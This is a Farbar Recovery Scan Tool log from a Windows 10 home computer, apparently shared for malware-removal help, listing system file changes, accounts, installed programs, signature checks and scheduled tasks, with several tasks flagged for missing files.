2016-12-13 22:59 - 2016-09-15 11:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-12-13 22:58 - 2016-12-09 05:32 - 07816032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-12-13 22:58 - 2016-12-09 05:27 - 00172528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2016-12-13 22:58 - 2016-12-09 05:20 - 02189664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-12-13 22:58 - 2016-12-09 05:20 - 00658784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-12-13 22:58 - 2016-12-09 05:20 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-12-13 22:58 - 2016-12-09 05:18 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-12-13 22:58 - 2016-12-09 05:15 - 01988560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-12-13 22:58 - 2016-12-09 04:47 - 22563328 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-12-13 22:58 - 2016-12-09 04:45 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\WordBreakers.dll
2016-12-13 22:58 - 2016-12-09 04:42 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-12-13 22:58 - 2016-12-09 04:37 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-12-13 22:58 - 2016-12-09 04:36 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-12-13 22:58 - 2016-12-09 04:36 - 03059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-12-13 22:58 - 2016-12-09 04:36 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2016-12-13 22:58 - 2016-12-09 04:33 - 03777536 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-12-13 22:58 - 2016-12-09 04:30 - 23677952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-12-13 22:58 - 2016-12-09 04:29 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-12-13 22:58 - 2016-12-09 04:27 - 13084160 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-12-13 22:58 - 2016-12-09 04:27 - 00981504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2016-12-13 22:58 - 2016-12-09 04:26 - 08129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-12-13 22:58 - 2016-12-09 04:22 - 02820096 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-12-13 22:58 - 2016-12-09 04:22 - 01490944 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-12-13 22:58 - 2016-12-09 04:21 - 04746752 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-12-13 22:58 - 2016-12-09 04:20 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2016-12-13 22:58 - 2016-12-09 04:19 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-12-13 22:58 - 2016-12-09 04:19 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-12-13 22:58 - 2016-12-09 04:19 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-12-13 22:58 - 2016-12-09 04:19 - 00085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditBufferTestHook.dll
2016-12-13 22:57 - 2016-12-09 05:42 - 01637728 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-12-13 22:57 - 2016-12-09 05:42 - 00137568 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-12-13 22:57 - 2016-12-09 05:34 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-12-13 22:57 - 2016-12-09 05:34 - 00894096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-12-13 22:57 - 2016-12-09 05:33 - 01354320 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-12-13 22:57 - 2016-12-09 05:33 - 01173496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-12-13 22:57 - 2016-12-09 05:30 - 00377184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-13 22:57 - 2016-12-09 05:28 - 00764392 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2016-12-13 22:57 - 2016-12-09 05:20 - 02677544 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2016-12-13 22:57 - 2016-12-09 05:19 - 00168424 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcrypt.dll
2016-12-13 22:57 - 2016-12-09 05:18 - 02913144 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-12-13 22:57 - 2016-12-09 05:18 - 01267512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-12-13 22:57 - 2016-12-09 05:14 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-12-13 22:57 - 2016-12-09 05:14 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-12-13 22:57 - 2016-12-09 05:10 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2016-12-13 22:57 - 2016-12-09 05:09 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2016-12-13 22:57 - 2016-12-09 04:41 - 00380928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2016-12-13 22:57 - 2016-12-09 04:38 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2016-12-13 22:57 - 2016-12-09 04:37 - 00411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-12-13 22:57 - 2016-12-09 04:36 - 00410112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-12-13 22:57 - 2016-12-09 04:33 - 01589760 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2016-12-13 22:57 - 2016-12-09 04:28 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-12-13 22:57 - 2016-12-09 04:27 - 05114368 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2016-12-13 22:57 - 2016-12-09 04:26 - 01692672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-12-13 22:57 - 2016-12-09 04:25 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
2016-12-13 22:57 - 2016-12-09 04:24 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-12-13 22:57 - 2016-12-09 04:21 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2016-12-13 22:57 - 2016-12-09 04:20 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-12-13 22:57 - 2016-11-02 05:25 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-12-13 22:56 - 2016-12-09 05:18 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2016-12-13 22:56 - 2016-12-09 05:18 - 00989024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2016-12-13 22:56 - 2016-12-09 05:18 - 00947552 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2016-12-13 22:56 - 2016-12-09 05:18 - 00811872 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-01-11 00:05 - 2016-09-26 19:51 - 00000000 ____D C:\Users\Dorraine
2017-01-10 20:33 - 2016-09-26 19:47 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-01-10 07:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-01-10 07:42 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-01-09 21:26 - 2016-06-04 17:02 - 00000887 _____ C:\Users\Dorraine\Desktop\Networdz.lnk
2017-01-08 14:38 - 2015-10-17 21:34 - 00000000 ___RD C:\Users\Dorraine\Dropbox
2017-01-04 23:18 - 2016-10-08 16:10 - 00051354 _____ C:\Users\Dorraine\Documents\Community Chapel Baptist Church Bulletin, Page 1.odt
2017-01-03 12:33 - 2016-11-15 17:55 - 00000000 ____D C:\Users\Dorraine\AppData\LocalLow\Mozilla
2017-01-03 12:28 - 2015-09-30 08:16 - 00000000 ____D C:\ProgramData\TEMP
2017-01-03 12:28 - 2015-09-30 08:16 - 00000000 ____D C:\Program Files (x86)\SpywareBlaster
2016-12-31 17:40 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\Videos
2016-12-31 17:35 - 2016-09-26 19:51 - 00000000 ____D C:\Users\Dorraine\AppData\Roaming
2016-12-31 17:33 - 2016-07-16 01:04 - 00000000 ___RD C:\Program Files (x86)
2016-12-31 16:36 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
2016-12-30 22:51 - 2016-09-26 19:51 - 00262144 ____H C:\Users\DefaultAppPool\NTUSER.DAT
2016-12-27 20:21 - 2016-09-26 19:48 - 00067584 ____S C:\WINDOWS\bootstat.dat
2016-12-27 20:19 - 2016-09-27 01:12 - 00007942 _____ C:\WINDOWS\PFRO.log
2016-12-27 20:19 - 2016-09-26 20:07 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-12-27 20:19 - 2016-09-26 19:57 - 3019087872 ___SH C:\hiberfil.sys
2016-12-27 20:19 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\drivers
2016-12-27 20:19 - 2016-06-24 10:36 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-12-27 20:19 - 2016-06-03 14:07 - 268435456 ___SH C:\swapfile.sys
2016-12-27 20:18 - 2016-09-26 19:51 - 104857600 ____H C:\Users\Dorraine\NTUSER.DAT
2016-12-27 20:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\catroot2
2016-12-27 20:18 - 2016-07-16 01:04 - 83886080 _____ C:\WINDOWS\system32\config\SOFTWARE
2016-12-27 20:18 - 2016-07-16 01:04 - 13369344 _____ C:\WINDOWS\system32\config\SYSTEM
2016-12-27 20:18 - 2016-07-16 01:04 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2016-12-27 20:18 - 2016-07-16 01:04 - 00524288 _____ C:\WINDOWS\system32\config\DEFAULT
2016-12-27 20:18 - 2016-07-16 01:04 - 00028672 _____ C:\WINDOWS\system32\config\SECURITY
2016-12-27 20:17 - 2016-09-27 01:11 - 06291456 ____H C:\Users\Dorraine\AppData\Local\IconCache.db
2016-12-25 06:51 - 2015-09-28 21:08 - 00000000 __SHD C:\System Volume Information
2016-12-24 15:02 - 2016-11-15 14:32 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-22 23:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Drivers\UMDF
2016-12-22 23:43 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\System32
2016-12-21 23:57 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\Pictures
2016-12-21 22:22 - 2016-07-16 06:47 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs
2016-12-21 22:22 - 2015-10-17 20:54 - 00000000 ____D C:\Program Files (x86)\Dropbox
2016-12-16 15:23 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2016-12-15 21:51 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\Microsoft.NET
2016-12-15 21:32 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\assembly
2016-12-15 20:08 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\system32\config
2016-12-15 11:43 - 2016-09-26 19:50 - 00524288 ___SH C:\WINDOWS\system32\config\COMPONENTS{f5b135e6-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000002.regtrans-ms
2016-12-15 11:43 - 2016-09-26 19:50 - 00524288 ___SH C:\WINDOWS\system32\config\COMPONENTS{f5b135e6-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000001.regtrans-ms
2016-12-15 11:43 - 2016-09-26 19:50 - 00065536 ___SH C:\WINDOWS\system32\config\COMPONENTS{f5b135e6-4b48-11e6-80cb-e41d2d012050}.TM.blf
2016-12-15 11:05 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\WinSxS
2016-12-14 19:19 - 2016-09-26 19:46 - 00524288 ___SH C:\WINDOWS\system32\config\DRIVERS{f5b135f1-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000001.regtrans-ms
2016-12-14 19:19 - 2016-09-26 19:46 - 00225032 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-12-14 19:19 - 2016-09-26 19:46 - 00065536 ___SH C:\WINDOWS\system32\config\DRIVERS{f5b135f1-4b48-11e6-80cb-e41d2d012050}.TM.blf
2016-12-14 19:19 - 2015-09-29 08:09 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-12-14 19:18 - 2016-07-16 06:47 - 00000796 ___SH C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\SysWOW64\en-US
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\en-US
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Boot
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppPatch
2016-12-14 19:18 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\SysWOW64
2016-12-14 19:18 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\system32\DriverStore
2016-12-14 06:06 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
2016-12-14 06:04 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-12-14 05:57 - 2015-09-28 15:17 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-12-14 05:55 - 2015-09-28 15:17 - 135632432 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-12-13 22:32 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-12-13 22:32 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-12-12 16:11 - 2016-09-26 19:51 - 00524288 ___SH C:\Users\Dorraine\NTUSER.DAT{289dfd7d-8454-11e6-ba0e-82e1840c0602}.TMContainer00000000000000000002.regtrans-ms
2016-12-12 16:11 - 2016-09-26 19:51 - 00065536 ___SH C:\Users\Dorraine\NTUSER.DAT{289dfd7d-8454-11e6-ba0e-82e1840c0602}.TM.blf

==================== Files in the root of some directories =======

2016-05-17 16:14 - 2016-05-26 23:14 - 0000145 _____ () C:\Users\Dorraine\AppData\Roaming\WB.CFG
2015-10-01 15:14 - 2016-10-13 15:10 - 0013271 _____ () C:\ProgramData\hpzinstall.log
2016-05-17 14:51 - 2016-05-17 14:51 - 0000016 _____ () C:\ProgramData\mntemp
2016-05-17 14:51 - 2016-05-17 14:51 - 0004131 _____ () C:\ProgramData\rxsmznjf.zcp

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-12-11 20:57

==================== End of FRST.txt ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 08-01-2017
Ran by Dorraine (11-01-2017 01:59:30)
Running from C:\Users\Dorraine\Downloads
Windows 10 Home Version 1607 (X64) (2016-09-27 01:10:09)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2694957348-435827945-4273115747-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2694957348-435827945-4273115747-503 - Limited - Disabled)
Dorraine (S-1-5-21-2694957348-435827945-4273115747-1000 - Administrator - Enabled) => C:\Users\Dorraine
Guest (S-1-5-21-2694957348-435827945-4273115747-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.020.20042 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Any Video Converter 6.0.7 (HKLM-x32\...\Any Video Converter) (Version: 6.0.7 - Anvsoft)
BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Copy (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Defraggler (HKLM\...\Defraggler) (Version: 2.19 - Piriform)
Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
DJ_AIO_03_F2200_Software_Min (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 16.4.30 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
F2200 (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Hearts Screen Saver (HKLM-x32\...\Hearts) (Version:  - )
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Deskjet F2200 All-In-One Driver Software 14.0 Rel. 6 (HKLM\...\{60D6AAC5-FDC1-49BA-867B-3135F4726156}) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.2024 - HP Photo Creations Powered by RocketLife)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
MarketResearch (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.43 - mIRC Co. Ltd.)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NewFreeScreensaver nfsSnowGlobe2 (HKLM-x32\...\Snow Globe 2 New Free Screensaver_is1) (Version:  - NewFreeScreensavers.com)
OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
OpenOffice 4.1.2 (HKLM-x32\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden
Spotify (HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Spotify) (Version: 1.0.28.87.g8f9312a4 - Spotify AB)
SpywareBlaster 5.5 (HKLM-x32\...\SpywareBlaster_is1) (Version: 5.5.0 - BrightFort LLC)
Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1206 - SUPERAntiSpyware.com)
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.59518 - TeamViewer)
Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
Windows Driver Package - Broadcom (k57nd) Net  (05/10/2011 14.8.0.5) (HKLM\...\6629B48C523118E251A0FF9A803F20EC1B1A9344) (Version: 05/10/2011 14.8.0.5 - Broadcom)
Windows Driver Package - Broadcom (k57nd60a) Net  (08/25/2012 15.4.0.9) (HKLM\...\E6C66B158167F5F97E7C3CC032E8B9CF807548D1) (Version: 08/25/2012 15.4.0.9 - Broadcom)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{087B3AE3-E237-4467-B8DB-5A38AB959AC9}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{3B092F0C-7696-40E3-A80F-68D74DA84210}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{63542C48-9552-494A-84F7-73AA6A7C99C1}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{7BC0E710-5703-45BE-A29D-5D46D8B39262}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\ooofilt_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{AE424E85-F6DF-4910-A6A9-438797986431}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\propertyhdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{C52AF81D-F7A0-4AAB-8E87-F80A60CCD396}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {09186449-4F69-4D44-AE36-EA2DBCFCF7D4} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {14EF3ED1-3A48-4E29-8661-AD0039797D76} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {21F8144E-8385-4FB5-8A93-41ECC6D63326} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {2FDD2155-71BB-429A-9A8F-78F4A259FDBD} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
Task: {308E7E8B-2216-4C27-BF3C-045EAA465BB3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-10-21] (Adobe Systems Incorporated)
Task: {313857CE-F959-4F91-BC7B-8277A3515412} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {3FD521FC-5F16-49A4-8F32-2343C0DCB866} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe
Task: {46C40E51-DCC9-49CE-898E-170CA5373F61} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {484686E2-A641-42BE-9D60-660116915CFC} - \CCleanerSkipUAC -> No File <==== ATTENTION
Task: {4BBB7A2E-49CB-4BF4-87CA-DEDAF4EC978E} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {4F03D14B-6E47-455B-83EA-E7A664B87E99} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {59B535FB-DCA8-41C6-9358-EAEAF710653D} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {63AC7C2E-1E01-4A02-84B0-1558549017E4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {67A22A2A-AA15-4F52-AD6A-062D6178B4C1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {6855ACB5-22ED-49E6-A845-551DD10C9A9E} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6F4ECD31-E3D7-4C10-B895-82E4C27AA3D0} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {7A59BCF6-FDB6-441C-AFCB-A13B00E6D086} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {7B7D2152-A018-4ECC-B82D-CCE1D62522A4} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {7F33D015-0655-46A8-B3DA-839C16E15F22} - System32\Tasks\{EF120DE6-BF35-43A2-B9B0-F60A443C2B68} => pcalua.exe -a "C:\Program Files (x86)\Xilisoft\YouTube Video Converter\Uninstall.exe"
Task: {815BA402-E344-4BD4-AE42-0CF840DD3A79} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
